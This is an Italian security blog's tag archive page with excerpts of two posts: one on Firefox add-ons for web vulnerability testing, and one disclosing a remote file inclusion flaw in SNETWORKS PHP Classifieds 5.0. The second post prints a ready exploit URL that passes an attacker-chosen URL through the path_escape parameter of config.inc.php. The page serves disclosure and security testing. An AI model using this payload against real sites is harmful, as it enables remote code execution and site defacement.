Tag Archives: remote file inclusion

[SECURITY] – 5 utili plugins per Firefox

17 febbraio 2009

1 Comment

In questo articolo vi presenterò 5 utili Addons di Firefox che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web.

I plugins di cui parlerò sono i seguenti:

  • Web Developer Bar
  • Xss Me
  • Sql Inject Me
  • HackBar
  • Tamper Data

Questi 5 plugin torneranno molto utili quando proveremo ad effettuare le nostre prime analisi di sicurezza in quanto permettono di analizzare diversi aspetti di un sito web. Va detto che non sono programmi  “per bucare” ma semplicemente dei test i cui risultati, se si hanno le giuste conoscenze, possono aiutare ad individuare falle o vulnerabilità in un dato sito.

[...]

Continue reading...

[EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 – RFI

4 ottobre 2008

0 Comments

Oggi facendo il mio lavoro sono incappato in un sito con installato lo script “SNETWORKS PHP CLASSIFIEDS” constatando che è vulnerabile a diversi tipi di hacking.

Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:

http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?

[...]

Continue reading...
Pagina 1 di 11
Stop SOPA